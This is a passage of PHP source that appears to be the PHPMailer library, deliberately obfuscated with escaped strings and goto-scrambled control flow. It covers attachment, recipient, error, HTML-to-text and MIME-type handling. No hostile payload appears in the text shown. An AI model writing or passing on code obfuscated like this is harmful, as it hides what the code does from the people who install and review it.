"\134\x30\x30\60\55\134\60\61\61\x5c\60\61\63\x5c\x30\x31\64\134\60\x31\x36\55\x5c\60\x33\x37\x5c\x30\67\65\x5c\60\67\67\134\x31\x33\x37\134\x31\x37\67\x2d\134\63\x37\67" . $pattern; goto JK0_8; } goto xpHvf; OiV_I: unset($matches[0][$eqkey]); goto XsvkS; iBD5e: return str_replace("\x20", "\137", $encoded); goto j6Slo; j6Slo: } public function addStringAttachment($string, $filename, $encoding = "\x62\x61\163\x65\66\x34", $type = '', $disposition = "\141\164\x74\x61\x63\x68\155\145\156\164") { goto QELij; zjcgD: lSmyv: goto diWLo; QELij: if (!($type == '')) { goto lSmyv; } goto c85ad; c85ad: $type = self::filenameToType($filename); goto zjcgD; diWLo: $this->attachment[] = array(0 => $string, 1 => $filename, 2 => basename($filename), 3 => $encoding, 4 => $type, 5 => true, 6 => $disposition, 7 => 0); goto SWW7V; SWW7V: } public function addEmbeddedImage($path, $cid, $name = '', $encoding = "\142\141\x73\145\66\64", $type = '', $disposition = "\151\x6e\x6c\151\x6e\145") { goto JKVzm; JKVzm: if (!(!self::isPermittedPath($path) or !@is_file($path))) { goto SGyqV; } goto TXXr8; Z2OJA: u2xPN: goto vLn4M; s92mP: UpbBR: goto q1a4x; q1a4x: $this->attachment[] = array(0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => $disposition, 7 => $cid); goto RR96D; vLn4M: $filename = basename($path); goto ojeIv; Yc82C: if (!($type == '')) { goto u2xPN; } goto SYbVF; TXXr8: $this->setError($this->lang("\x66\151\x6c\145\137\141\x63\143\x65\x73\x73") . $path); goto Tifc5; Tifc5: return false; goto xPkZ7; ojeIv: if (!($name == '')) { goto UpbBR; } goto r9Dus; SYbVF: $type = self::filenameToType($path); goto Z2OJA; r9Dus: $name = $filename; goto s92mP; RR96D: return true; goto HQYmd; xPkZ7: SGyqV: goto Yc82C; HQYmd: } public function addStringEmbeddedImage($string, $cid, $name = '', $encoding = "\x62\x61\163\x65\x36\x34", $type = '', $disposition = "\151\156\154\x69\x6e\x65") { goto tBXlW; NIeqz: dj0lQ: goto TVNTw; CiTa9: return true; goto RJWO1; TVNTw: $this->attachment[] = array(0 => $string, 1 => $name, 2 => $name, 3 => $encoding, 4 => $type, 5 => true, 6 => $disposition, 7 => $cid); goto CiTa9; IJgNd: $type = self::filenameToType($name); goto NIeqz; tBXlW: if (!($type == '' and !empty($name))) { goto dj0lQ; } goto IJgNd; RJWO1: } public function inlineImageExists() { goto hXRfO; ZEfKQ: Xpz8f: goto kEM2F; hXRfO: foreach ($this->attachment as $attachment) { goto FURaF; miP_Y: q1zLz: goto QxBVx; KC3IJ: return true; goto LnSEn; LnSEn: X_nkQ: goto miP_Y; FURaF: if (!($attachment[6] == "\x69\156\154\151\x6e\x65")) { goto X_nkQ; } goto KC3IJ; QxBVx: } goto ZEfKQ; kEM2F: return false; goto fp3mF; fp3mF: } public function attachmentExists() { goto AlOOF; AlOOF: foreach ($this->attachment as $attachment) { goto w0Rep; G4lhm: return true; goto HAXyt; w0Rep: if (!($attachment[6] == "\141\x74\164\x61\x63\x68\155\x65\x6e\164")) { goto TvWGN; } goto G4lhm; JiguS: pwk6a: goto fZ3IC; HAXyt: TvWGN: goto JiguS; fZ3IC: } goto Q9Lb7; Q9Lb7: l5Grv: goto YJvxS; YJvxS: return false; goto ZRClr; ZRClr: } public function alternativeExists() { return !empty($this->AltBody); } public function clearQueuedAddresses($kind) { goto buGKj; OHUIx: XfLeN: goto OEO6v; buGKj: $RecipientsQueue = $this->RecipientsQueue; goto O_n1u; O_n1u: foreach ($RecipientsQueue as $address => $params) { goto PxGKE; PxGKE: if (!($params[0] == $kind)) { goto qasrS; } goto u3u6i; N3voU: G2c__: goto KkukQ; u3u6i: unset($this->RecipientsQueue[$address]); goto HwCj4; HwCj4: qasrS: goto N3voU; KkukQ: } goto OHUIx; OEO6v: } public function clearAddresses() { goto qIQcf; jwcO7: $this->clearQueuedAddresses("\x74\157"); goto bwF8s; yVfh0: $this->to = array(); goto jwcO7; ASeAE: hOKg8: goto yVfh0; qIQcf: foreach ($this->to as $to) { unset($this->all_recipients[strtolower($to[0])]); DZtsU: } goto ASeAE; bwF8s: } public function clearCCs() { goto cOZhz; OMh2U: $this->cc = array(); goto Bra0S; Bra0S: $this->clearQueuedAddresses("\143\143"); goto cRrbM; cOZhz: foreach ($this->cc as $cc) { unset($this->all_recipients[strtolower($cc[0])]); UHCQ3: } goto NGazJ; NGazJ: s2z8k: goto OMh2U; cRrbM: } public function clearBCCs() { goto RlYJ3; q6rd2: $this->bcc = array(); goto c10hp; c10hp: $this->clearQueuedAddresses("\x62\143\143"); goto BYWf7; NK2DU: JY2sm: goto q6rd2; RlYJ3: foreach ($this->bcc as $bcc) { unset($this->all_recipients[strtolower($bcc[0])]); Pm68T: } goto NK2DU; BYWf7: } public function clearReplyTos() { $this->ReplyTo = array(); $this->ReplyToQueue = array(); } public function clearAllRecipients() { goto HKOXl; OaJay: $this->cc = array(); goto JCoNE; HKOXl: $this->to = array(); goto OaJay; OeDtM: $this->RecipientsQueue = array(); goto h69fM; wJuvN: $this->all_recipients = array(); goto OeDtM; JCoNE: $this->bcc = array(); goto wJuvN; h69fM: } public function clearAttachments() { $this->attachment = array(); } public function clearCustomHeaders() { $this->CustomHeader = array(); } protected function setError($msg) { goto sL9is; DbF7R: if (!($this->Mailer == "\163\x6d\164\x70" and !is_null($this->smtp))) { goto lbuT5; } goto qYBRD; LXMmB: if (empty($lasterror["\163\155\x74\x70\x5f\143\x6f\144\145\137\145\x78"])) { goto hR2ID; } goto lv8gS; hdm4M: QnncS: goto LXMmB; lNwsm: if (empty($lasterror["\144\x65\x74\x61\x69\154"])) { goto wts51; } goto R8uSV; pBD1e: $msg .= "\x20\x53\x4d\x54\x50\40\143\157\144\145\x3a\x20" . $lasterror["\163\x6d\164\x70\x5f\x63\x6f\144\x65"]; goto hdm4M; lv8gS: $msg .= "\40\101\x64\144\x69\x74\x69\x6f\156\141\x6c\40\x53\115\124\x50\x20\151\x6e\x66\x6f\72\40" . $lasterror["\x73\x6d\x74\160\x5f\x63\157\144\x65\x5f\145\x78"]; goto iLkuM; sL9is: $this->error_count++; goto DbF7R; DSLlr: if (empty($lasterror["\163\155\x74\x70\x5f\143\157\144\x65"])) { goto QnncS; } goto pBD1e; C3Rab: lbuT5: goto EZH1G; wCYI1: $msg .= $this->lang("\x73\x6d\x74\x70\137\145\x72\162\157\162") . $lasterror["\x65\162\162\157\162"]; goto lNwsm; mKdKh: g7U1B: goto C3Rab; EZH1G: $this->ErrorInfo = $msg; goto doUFr; FqPlu: if (empty($lasterror["\x65\162\162\157\x72"])) { goto g7U1B; } goto wCYI1; qYBRD: $lasterror = $this->smtp->getError(); goto FqPlu; R8uSV: $msg .= "\40\104\145\x74\141\x69\154\72\40" . $lasterror["\144\145\x74\141\151\154"]; goto sKsPC; iLkuM: hR2ID: goto mKdKh; sKsPC: wts51: goto DSLlr; doUFr: } public static function rfcDate() { date_default_timezone_set(@date_default_timezone_get()); return date("\x44\x2c\x20\x6a\x20\x4d\x20\131\40\x48\72\x69\72\163\40\117"); } protected function serverHostname() { goto rhKk_; rhKk_: $result = "\154\157\x63\141\154\150\157\163\164\x2e\154\x6f\x63\141\154\144\x6f\155\x61\x69\x6e"; goto cf6eF; wnOBc: $result = $_SERVER["\123\105\122\126\x45\122\x5f\x4e\x41\x4d\x45"]; goto Nt36v; U_wWQ: if (isset($_SERVER) and array_key_exists("\123\x45\122\x56\x45\x52\137\116\x41\x4d\x45", $_SERVER) and !empty($_SERVER["\123\x45\122\x56\x45\122\x5f\x4e\101\x4d\x45"])) { goto bUe1_; } goto UNyTk; klQJE: if (php_uname("\156") !== false) { goto oxdS_; } goto fbJl8; Nt36v: goto WgY1X; goto s9u3v; BFf0m: WgY1X: goto zYZCb; hNLja: goto WgY1X; goto XTOoG; s9u3v: ePFV1: goto NNbxj; XTOoG: oxdS_: goto bcWKi; UNyTk: if (function_exists("\x67\145\x74\150\157\163\x74\156\141\155\x65") && gethostname() !== false) { goto ePFV1; } goto klQJE; fbJl8: goto WgY1X; goto Fz2aV; gZJJP: goto WgY1X; goto HvS7L; bcWKi: $result = php_uname("\x6e"); goto BFf0m; NNbxj: $result = gethostname(); goto hNLja; cf6eF: if (!empty($this->Hostname)) { goto mU9Nq; } goto U_wWQ; C90e0: $result = $this->Hostname; goto gZJJP; Fz2aV: mU9Nq: goto C90e0; HvS7L: bUe1_: goto wnOBc; zYZCb: return $result; goto vhapT; vhapT: } protected function lang($key) { goto lOzw5; f_2CH: qxiZd: goto lZi7K; EUjWe: H_fZD: goto E5Fxp; lOzw5: if (!(count($this->language) < 1)) { goto H_fZD; } goto pn4Jh; px3l2: BHvCf: goto ou3Bz; ou3Bz: if (!($key == "\x73\x6d\x74\x70\137\x63\157\x6e\x6e\145\143\164\x5f\146\x61\151\154\x65\x64")) { goto h5It7; } goto T6TFK; sG_vl: return $this->language[$key]; goto f_2CH; E5Fxp: if (array_key_exists($key, $this->language)) { goto BHvCf; } goto zphN_; zphN_: return $key; goto hpnEC; pn4Jh: $this->setLanguage("\x65\x6e"); goto EUjWe; hpnEC: goto qxiZd; goto px3l2; E3UjN: h5It7: goto sG_vl; T6TFK: return $this->language[$key] . "\40\x68\x74\164\160\x73\72\57\x2f\x67\x69\164\x68\165\x62\x2e\143\x6f\x6d\57\120\x48\120\115\141\151\154\x65\162\x2f\x50\x48\120\115\x61\151\x6c\x65\x72\57\167\151\x6b\151\57\x54\162\157\165\x62\x6c\145\x73\150\157\x6f\x74\151\156\x67"; goto E3UjN; lZi7K: } public function isError() { return $this->error_count > 0; } public function fixEOL($str) { goto yW3Iu; IvorX: if (!($this->LE !== "\12")) { goto waXiP; } goto vr8rS; vmgFF: waXiP: goto pVPZh; pVPZh: return $nstr; goto I1Zbt; yW3Iu: $nstr = str_replace(array("\xd\xa", "\xd"), "\xa", $str); goto IvorX; vr8rS: $nstr = str_replace("\12", $this->LE, $nstr); goto vmgFF; I1Zbt: } public function addCustomHeader($name, $value = null) { goto tsF2V; IA8YX: $this->CustomHeader[] = explode("\72", $name, 2); goto D1aWT; J1TVm: Xn6bY: goto IA8YX; tsF2V: if ($value === null) { goto Xn6bY; } goto rXpFG; D1aWT: DAuR_: goto nwXZV; rXpFG: $this->CustomHeader[] = array($name, $value); goto jAqvT; jAqvT: goto DAuR_; goto J1TVm; nwXZV: } public function getCustomHeaders() { return $this->CustomHeader; } public function msgHTML($message, $basedir = '', $advanced = false) { goto Yzs4M; dAlcJ: foreach ($images[2] as $imgindex => $url) { goto Rpcjn; Yu9Gj: $data = base64_decode($data); goto Sy4h2; UasVB: goto I8rGD; goto bDp21; Nsz2v: $message = preg_replace("\x2f" . $images[1][$imgindex] . "\75\x5b\x22\47\x5d" . preg_quote($url, "\x2f") . "\133\x22\47\x5d\x2f\125\x69", $images[1][$imgindex] . "\x3d\42\143\x69\x64\x3a" . $cid . "\x22", $message); goto GTq3p; vyf2P: $cid = md5($url) . "\x40\x70\x68\x70\x6d\x61\151\x6c\x65\162\56\x30"; goto ZfKaW; ZfKaW: if (!(strlen($directory) > 1 && substr($directory, -1) != "\x2f")) { goto vnEqj; } goto qMqUF; qMqUF: $directory .= "\57"; goto pL0oU; pL0oU: vnEqj: goto PEL28; Hqxz_: $data = substr($url, strpos($url, "\54")); goto NKXNJ; Zlcog: goto onpLq; goto gTDXC; GTq3p: kTljc: goto dQ4FH; o8mLn: if (!$this->addStringEmbeddedImage($data, $cid, "\x65\155\x62\x65\x64" . $imgindex, "\142\x61\x73\x65\x36\64", $match[1])) { goto j4cey; } goto bj9Fe; dwuKd: $data = rawurldecode($data); goto Zlcog; NKXNJ: if ($match[2]) { goto PGvjS; } goto dwuKd; Rpcjn: if (!preg_match("\x23\x5e\x64\x61\164\x61\72\50\151\155\x61\147\x65\x5b\x5e\73\x2c\135\52\51\x28\73\x62\x61\x73\145\66\x34\x29\77\x2c\x23", $url, $match)) { goto O_tTt; } goto Hqxz_; tpII5: $filename = basename($url); goto PHyF_; lWcm7: I8rGD: goto af1NI; yMyXE: j4cey: goto UasVB; PHyF_: $directory = dirname($url); goto PcrAA; Sy4h2: onpLq: goto zDMEK; cGLdV: yD1ET: goto vyf2P; kUv5K: if (!(!empty($basedir) && strpos($url, "\56\x2e") === false && substr($url, 0, 4) !== "\143\151\144\x3a" && !preg_match("\x23\x5e\133\141\55\x7a\135\133\x61\x2d\x7a\60\55\71\53\x2e\x2d\135\x2a\x3a\77\x2f\57\43\x69", $url))) { goto MLkeG; } goto tpII5; bj9Fe: $message = str_replace($images[0][$imgindex], $images[1][$imgindex] . "\75\42\143\151\144\72" . $cid . "\x22", $message); goto yMyXE; bDp21: O_tTt: goto kUv5K; PEL28: if (!$this->addEmbeddedImage($basedir . $directory . $filename, $cid, $filename, "\142\x61\163\x65\66\x34", self::_mime_types((string) self::mb_pathinfo($filename, PATHINFO_EXTENSION)))) { goto kTljc; } goto Nsz2v; dQ4FH: MLkeG: goto lWcm7; PcrAA: if (!($directory == "\56")) { goto yD1ET; } goto r8SuE; gTDXC: PGvjS: goto Yu9Gj; zDMEK: $cid = md5($url) . "\x40\x70\x68\x70\x6d\x61\151\x6c\145\162\x2e\x30"; goto o8mLn; r8SuE: $directory = ''; goto cGLdV; af1NI: } goto P00OM; ZDx6t: ZdDSk: goto mRXO_; H5F_D: if ($this->alternativeExists()) { goto ZdDSk; } goto d2ow2; P00OM: L_pIT: goto yKu8I; Yzs4M: preg_match_all("\57\50\163\x72\x63\x7c\142\x61\143\x6b\147\x72\x6f\x75\x6e\x64\51\75\x5b\42\x27\135\50\56\x2a\x29\133\x22\x27\x5d\57\x55\x69", $message, $images); goto IeQ5N; IeQ5N: if (!array_key_exists(2, $images)) { goto bu1iR; } goto BjOJW; fidJs: $this->Body = $this->normalizeBreaks($message); goto Wt7kG; c0KlK: Elpon: goto dAlcJ; o0u1K: $this->isHTML(true); goto fidJs; yKu8I: bu1iR: goto o0u1K; Wt7kG: $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced)); goto H5F_D; mRXO_: return $this->Body; goto XSAkZ; d2ow2: $this->AltBody = "\x54\x6f\x20\166\151\x65\167\40\x74\x68\x69\163\x20\145\155\141\x69\x6c\x20\155\x65\163\x73\141\x67\145\54\x20\x6f\x70\145\x6e\40\x69\x74\40\x69\156\x20\x61\40\x70\x72\x6f\147\162\x61\x6d\40\164\x68\141\x74\x20\x75\x6e\x64\145\x72\x73\x74\x61\x6e\x64\x73\x20\110\x54\x4d\x4c\x21" . self::CRLF . self::CRLF; goto ZDx6t; spAtp: $basedir .= "\x2f"; goto c0KlK; BjOJW: if (!(strlen($basedir) > 1 && substr($basedir, -1) != "\x2f")) { goto Elpon; } goto spAtp; XSAkZ: } public function html2text($html, $advanced = false) { goto Lxq9Y; Lxq9Y: if (!is_callable($advanced)) { goto I_wNx; } goto pQXJH; xgmz6: I_wNx: goto T_9XY; T_9XY: return html_entity_decode(trim(strip_tags(preg_replace("\57\x3c\x28\150\145\x61\144\174\164\x69\164\x6c\145\174\163\x74\x79\x6c\x65\174\163\x63\x72\x69\x70\164\x29\x5b\136\76\135\52\76\x2e\52\77\74\134\x2f\134\x31\x3e\57\163\151", '', $html))), ENT_QUOTES, $this->CharSet); goto JPAXA; pQXJH: return call_user_func($advanced, $html); goto xgmz6; JPAXA: } public static function _mime_types($ext = '') { goto s7m_O; s7m_O: $mimes = array("\170\154" => "\x61\160\x70\x6c\x69\x63\x61\164\151\157\156\57\x65\x78\143\x65\x6c", "\152\163" => "\141\x70\160\154\151\143\x61\164\x69\x6f\156\57\x6a\141\x76\x61\163\x63\x72\151\x70\164", "\150\x71\x78" => "\141\160\x70\154\x69\143\x61\x74\x69\157\x6e\57\155\141\x63\55\x62\151\156\150\145\170\x34\60", "\x63\160\x74" => "\x61\160\x70\154\151\143\x61\164\151\157\x6e\x2f\155\x61\143\55\143\x6f\x6d\160\x61\x63\x74\x70\162\x6f", "\x62\x69\156" => "\141\x70\x70\154\x69\143\x61\x74\151\157\x6e\x2f\x6d\x61\143\x62\x69\x6e\x61\x72\x79", "\x64\x6f\143" => "\141\x70\160\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\155\x73\x77\x6f\x72\x64", "\x77\x6f\162\144" => "\x61\160\160\154\151\x63\x61\164\x69\157\156\57\155\163\167\157\162\144", "\170\x6c\x73\170" => "\x61\x70\x70\154\151\x63\141\x74\151\x6f\x6e\57\x76\x6e\144\56\157\x70\145\x6e\170\155\154\146\x6f\x72\x6d\141\164\x73\x2d\x6f\146\x66\151\x63\145\144\x6f\143\x75\155\145\x6e\x74\x2e\163\160\162\145\x61\x64\x73\x68\x65\145\164\155\x6c\x2e\163\150\145\145\x74", "\170\154\164\x78" => "\x61\x70\160\x6c\151\143\x61\164\x69\157\x6e\x2f\x76\156\x64\x2e\157\160\145\x6e\x78\x6d\x6c\146\x6f\162\x6d\x61\164\x73\55\x6f\146\146\x69\x63\x65\144\157\x63\165\x6d\145\x6e\164\56\x73\160\162\145\x61\x64\x73\x68\x65\x65\164\x6d\154\x2e\164\x65\155\x70\154\141\164\145", "\x70\157\164\x78" => "\141\160\160\154\x69\x63\x61\164\x69\x6f\156\57\x76\x6e\144\x2e\157\160\x65\x6e\x78\155\x6c\x66\157\x72\x6d\141\164\x73\x2d\157\146\x66\151\143\x65\144\157\143\x75\155\145\x6e\164\x2e\160\162\x65\163\145\156\164\x61\x74\x69\157\x6e\x6d\154\x2e\x74\x65\x6d\160\154\141\x74\145", "\x70\160\163\170" => "\x61\x70\160\154\x69\x63\x61\164\x69\x6f\156\x2f\166\156\x64\x2e\x6f\160\145\x6e\x78\155\x6c\146\157\162\155\x61\x74\x73\55\x6f\x66\146\151\143\x65\x64\157\x63\165\155\145\156\164\x2e\x70\162\x65\163\x65\x6e\164\141\164\x69\x6f\x6e\155\x6c\x2e\x73\154\x69\144\145\163\150\x6f\x77", "\160\x70\x74\170" => "\x61\x70\160\x6c\x69\x63\141\164\x69\157\x6e\57\x76\x6e\x64\x2e\157\x70\145\156\170\155\x6c\x66\x6f\x72\155\x61\x74\x73\x2d\x6f\x66\x66\x69\143\x65\144\157\143\x75\x6d\x65\156\164\56\x70\162\x65\163\145\x6e\164\x61\x74\151\157\156\155\x6c\x2e\x70\162\145\163\145\156\164\x61\164\x69\157\156", "\163\154\144\x78" => "\x61\160\x70\154\x69\x63\x61\164\151\157\x6e\57\x76\156\144\56\x6f\x70\145\156\170\x6d\x6c\146\157\162\155\141\164\163\55\x6f\146\146\x69\143\145\144\x6f\143\165\155\145\156\164\56\x70\162\x65\x73\145\x6e\164\x61\x74\x69\157\x6e\155\154\x2e\163\154\x69\x64\x65", "\144\x6f\x63\170" => "\x61\160\160\x6c\x69\x63\141\164\x69\x6f\x6e\x2f\x76\156\x64\56\x6f\x70\x65\x6e\x78\155\154\146\x6f\162\155\x61\164\163\x2d\157\146\x66\x69\143\x65\x64\x6f\x63\165\x6d\145\x6e\x74\x2e\167\157\162\144\x70\x72\x6f\143\145\x73\x73\151\156\x67\155\154\x2e\x64\x6f\143\165\155\145\156\164", "\144\x6f\164\x78" => "\141\160\160\154\151\x63\141\x74\151\157\156\x2f\166\x6e\x64\x2e\157\160\x65\156\x78\155\154\x66\x6f\x72\x6d\141\164\163\55\x6f\146\x66\151\143\145\144\x6f\143\165\x6d\145\x6e\x74\56\x77\157\x72\144\x70\162\x6f\143\x65\x73\163\x69\156\x67\155\x6c\56\164\145\155\x70\154\x61\x74\145", "\x78\154\x61\155" => "\x61\160\x70\x6c\x69\143\141\x74\151\157\156\57\x76\x6e\x64\x2e\x6d\x73\x2d\x65\x78\143\x65\154\x2e\x61\144\x64\151\156\56\x6d\141\143\x72\157\x45\x6e\141\x62\x6c\x65\144\56\x31\x32", "\170\x6c\x73\x62" => "\x61\160\160\x6c\151\143\141\164\151\157\x6e\x2f\166\x6e\144\56\155\x73\x2d\x65\x78\x63\145\154\x2e\163\150\145\x65\164\x2e\x62\151\156\141\162\x79\x2e\155\141\143\162\x6f\x45\x6e\x61\142\154\145\144\x2e\x31\62", "\143\154\141\163\163" => "\141\x70\x70\154\x69\143\x61\x74\x69\x6f\156\x2f\157\x63\x74\145\x74\x2d\x73\164\162\x65\x61\x6d", "\x64\x6c\154" => "\141\160\160\x6c\x69\x63\x61\x74\151\x6f\x6e\57\x6f\x63\x74\145\x74\55\x73\x74\162\145\x61\155", "\144\155\x73" => "\x61\160\x70\154\151\143\141\x74\x69\x6f\156\57\x6f\143\164\x65\x74\55\x73\164\162\x65\141\x6d", "\145\170\145" => "\141\160\160\x6c\x69\x63\141\x74\x69\157\156\x2f\157\143\164\x65\164\55\163\x74\162\x65\x61\155", "\154\x68\141" => "\141\x70\x70\154\151\x63\141\x74\x69\157\x6e\57\157\143\164\x65\x74\x2d\163\x74\162\x65\141\155", "\x6c\172\150" => "\x61\160\160\154\151\x63\141\164\x69\157\156\x2f\157\143\164\145\164\x2d\x73\164\162\145\x61\x6d", "\160\x73\144" => "\x61\160\160\x6c\151\143\141\164\151\157\x6e\57\157\143\164\x65\x74\x2d\x73\x74\162\145\x61\155", "\163\145\141" => "\x61\160\160\154\x69\143\x61\164\151\157\x6e\57\x6f\x63\x74\x65\x74\55\163\164\x72\145\x61\155", "\163\x6f" => "\141\x70\160\154\151\143\x61\x74\x69\157\x6e\x2f\x6f\143\164\145\x74\x2d\163\164\162\145\141\x6d", "\x6f\144\x61" => "\x61\160\x70\x6c\x69\143\x61\x74\151\157\x6e\x2f\x6f\x64\141", "\x70\x64\x66" => "\141\160\160\154\151\x63\141\164\x69\157\x6e\x2f\x70\144\146", "\x61\151" => "\141\x70\x70\x6c\151\143\141\164\151\157\x6e\57\160\157\x73\164\163\x63\162\151\160\164", "\145\x70\x73" => "\x61\x70\160\154\151\143\x61\164\x69\x6f\x6e\x2f\x70\x6f\x73\164\163\x63\162\x69\x70\164", "\160\163" => "\141\x70\160\154\x69\x63\141\164\x69\157\156\x2f\160\157\x73\164\x73\x63\x72\151\160\x74", "\163\x6d\x69" => "\141\x70\x70\x6c\x69\x63\141\x74\151\157\156\x2f\163\x6d\151\x6c", "\x73\x6d\151\154" => "\x61\160\x70\154\x69\x63\x61\x74\x69\x6f\156\57\163\155\x69\154", "\155\x69\146" => "\x61\160\x70\154\151\x63\x61\x74\151\157\x6e\57\x76\x6e\x64\x2e\x6d\x69\x66", "\170\x6c\163" => "\141\160\160\x6c\151\143\141\164\x69\157\156\57\166\156\144\x2e\x6d\163\55\145\170\143\x65\154", "\160\160\x74" => "\141\160\x70\154\x69\x63\141\164\x69\157\x6e\57\x76\x6e\x64\56\x6d\x73\x2d\x70\157\167\145\x72\x70\x6f\151\156\164", "\x77\x62\x78\155\154" => "\x61\x70\x70\154\151\x63\x61\x74\151\157\156\57\x76\x6e\x64\56\x77\x61\160\x2e\x77\142\170\155\x6c", "\167\155\x6c\x63" => "\x61\x70\x70\x6c\151\143\141\164\x69\x6f\156\x2f\166\x6e\144\56\x77\141\x70\x2e\167\x6d\154\x63", "\x64\x63\x72" => "\x61\x70\160\154\151\x63\141\164\x69\157\156\x2f\170\55\144\151\162\145\x63\x74\157\162", "\x64\151\x72" => "\x61\x70\160\x6c\x69\x63\141\x74\151\x6f\156\57\170\x2d\x64\x69\162\x65\143\x74\157\162", "\144\x78\x72" => "\x61\x70\x70\154\x69\x63\x61\164\x69\157\156\57\x78\x2d\x64\x69\x72\x65\143\x74\157\x72", "\x64\166\151" => "\141\x70\x70\154\x69\143\x61\164\151\157\156\x2f\170\55\144\166\151", "\147\164\x61\x72" => "\141\160\160\154\151\x63\141\164\x69\x6f\x6e\x2f\170\x2d\147\164\x61\162", "\x70\x68\160\x33" => "\x61\x70\x70\154\151\143\x61\164\151\157\x6e\x2f\170\x2d\150\164\164\160\144\x2d\160\x68\x70", "\160\150\160\64" => "\141\x70\x70\154\x69\143\141\x74\x69\157\x6e\57\x78\55\x68\164\164\160\144\55\160\150\160", "\x70\150\160" => "\x61\x70\x70\154\x69\143\x61\164\x69\157\x6e\57\x78\x2d\x68\164\x74\x70\x64\55\x70\x68\x70", "\160\x68\x74\155\x6c" => "\141\x70\160\154\151\143\141\164\x69\157\156\x2f\170\55\x68\x74\x74\x70\x64\x2d\x70\150\x70", "\160\150\x70\163" => "\141\x70\160\x6c\151\x63\x61\x74\x69\x6f\x6e\57\170\x2d\x68\164\164\x70\x64\x2d\160\x68\x70\55\x73\157\165\x72\143\x65", "\163\x77\146" => "\x61\x70\160\x6c\151\143\141\x74\x69\157\156\x2f\x78\55\x73\x68\157\143\x6b\167\x61\x76\145\x2d\x66\154\141\163\150", "\x73\x69\164" => "\141\160\160\x6c\x69\143\141\164\151\157\156\57\x78\x2d\163\164\x75\146\x66\x69\x74", "\164\x61\x72" => "\x61\x70\x70\x6c\151\x63\x61\164\x69\x6f\156\57\170\55\164\141\162", "\x74\147\172" => "\x61\x70\x70\154\151\143\141\164\x69\x6f\x6e\x2f\x78\55\x74\141\x72", "\x78\x68\x74" => "\x61\x70\x70\x6c\x69\143\x61\164\151\157\x6e\x2f\170\150\164\155\154\x2b\x78\155\x6c", "\170\x68\164\x6d\x6c" => "\141\x70\160\x6c\151\x63\x61\164\151\157\156\57\x78\150\x74\x6d\x6c\53\x78\155\x6c", "\172\x69\160" => "\x61\160\160\154\x69\x63\x61\164\x69\x6f\156\57\172\x69\x70", "\x6d\151\144" => "\141\165\x64\x69\x6f\57\155\x69\144\151", "\155\151\144\151" => "\x61\x75\144\x69\157\x2f\155\151\x64\x69", "\155\160\x32" => "\141\x75\144\151\157\57\x6d\x70\145\x67", "\155\160\63" => "\x61\x75\x64\x69\x6f\x2f\x6d\160\x65\147", "\155\x70\x67\x61" => "\141\x75\x64\x69\x6f\x2f\x6d\x70\x65\147", "\141\151\146" => "\x61\x75\x64\x69\x6f\x2f\x78\55\141\x69\146\x66", "\x61\151\x66\x63" => "\x61\165\144\x69\157\x2f\170\x2d\x61\x69\146\146", "\141\151\146\146" => "\x61\165\x64\x69\157\57\170\55\x61\x69\x66\x66", "\162\x61\x6d" => "\141\x75\144\x69\157\x2f\x78\55\x70\x6e\x2d\x72\x65\141\x6c\141\x75\144\151\157", "\x72\155" => "\141\165\144\151\x6f\x2f\170\x2d\x70\x6e\55\x72\x65\141\x6c\141\x75\144\x69\x6f", "\162\x70\155" => "\141\165\x64\x69\x6f\57\x78\55\160\x6e\x2d\x72\145\141\x6c\x61\x75\x64\x69\157\55\160\x6c\165\x67\151\156", "\162\x61" => "\141\165\144\x69\x6f\57\170\55\162\145\x61\154\141\x75\144\x69\157", "\x77\141\166" => "\141\x75\144\x69\157\x2f\x78\55\x77\141\166", "\x62\x6d\160" => "\x69\x6d\141\147\145\x2f\142\x6d\x70", "\x67\151\146" => "\151\x6d\x61\147\x65\57\147\151\146", "\152\160\x65\x67" => "\151\155\141\x67\x65\x2f\x6a\160\x65\147", "\152\160\145" => "\151\x6d\141\x67\145\x2f\152\x70\145\x67", "\x6a\x70\x67" => "\x69\155\x61\147\145\x2f\152\x70\x65\147", "\x70\x6e\147" => "\x69\x6d\x61\x67\x65\x2f\160\x6e\x67", "\164\151\146\146" => "\151\155\x61\147\x65\x2f\x74\x69\x66\x66", "\164\x69\146" => "\151\155\x61\147\x65\57\x74\x69\146\146", "\x65\x6d\x6c" => "\x6d\145\x73\x73\x61\x67\145\57\x72\146\x63\70\62\62", "\x63\x73\x73" => "\x74\145\x78\164\57\143\x73\163", "\150\164\155\x6c" => "\x74\x65\170\x74\x2f\x68\x74\155\154", "\150\x74\x6d" => "\164\x65\x78\x74\x2f\150\164\x6d\x6c", "\x73\x68\x74\155\154" => "\x74\x65\170\x74\x2f\150\x74\x6d\154", "\154\x6f\x67" => "\164\x65\170\x74\57\160\x6c\x61\151\156", "\x74\145\x78\164" => "\164\145\170\164\57\x70\x6c\x61\151\x6e", "\164\170\x74" => "\x74\145\x78\164\x2f\160\154\141\151\x6e", "\162\x74\x78" => "\164\145\x78\164\57\162\151\143\x68\164\145\170\164", "\x72\x74\x66" => "\x74\145\170\x74\x2f\x72\164\146", "\x76\143\146" => "\x74\x65\170\x74\x2f\x76\143\x61\162\144", "\166\143\x61\x72\x64" => "\x74\x65\x78\164\x2f\166\x63\141\x72\144", "\170\x6d\x6c" => "\x74\145\x78\x74\57\x78\155\154", "\170\x73\x6c" => "\x74\x65\170\164\57\170\155\x6c", "\x6d\160\x65\147" => "\x76\x69\x64\x65\x6f\57\155\160\145\x67", "\x6d\x70\x65" => "\x76\151\144\145\x6f\57\155\x70\x65\x67", "\x6d\x70\147" => "\166\x69\144\145\157\x2f\x6d\x70\x65\x67", "\x6d\x6f\x76" => "\166\x69\144\145\157\x2f\x71\x75\x69\143\153\164\151\155\x65", "\161\164" => "\x76\x69\144\x65\157\57\161\165\151\x63\153\x74\x69\x6d\x65", "\162\x76" => "\x76\151\144\x65\157\57\x76\156\144\x2e\162\156\x2d\x72\145\141\x6c\x76\x69\144\145\x6f", "\x61\166\151" => "\166\151\144\145\157\57\170\55\155\163\x76\x69\144\145\157", "\x6d\x6f\x76\151\145" => "\166\151\144\x65\x6f\x2f\170\55\163\x67\x69\55\155\x6f\x76\x69\x65"); goto j2KTi; j2KTi: if (!array_key_exists(strtolower($ext), $mimes)) { goto Lhz2v; } goto otYtB; q3XeJ: return "\x61\160\160\154\x69\x63\x61\164\151\x6f\x6e\x2f\x6f\143\164\x65\x74\55\163\x74\162\x65\x61\155"; goto FKYej; otYtB: return $mimes[strtolower($ext)]; goto xZhit; xZhit: 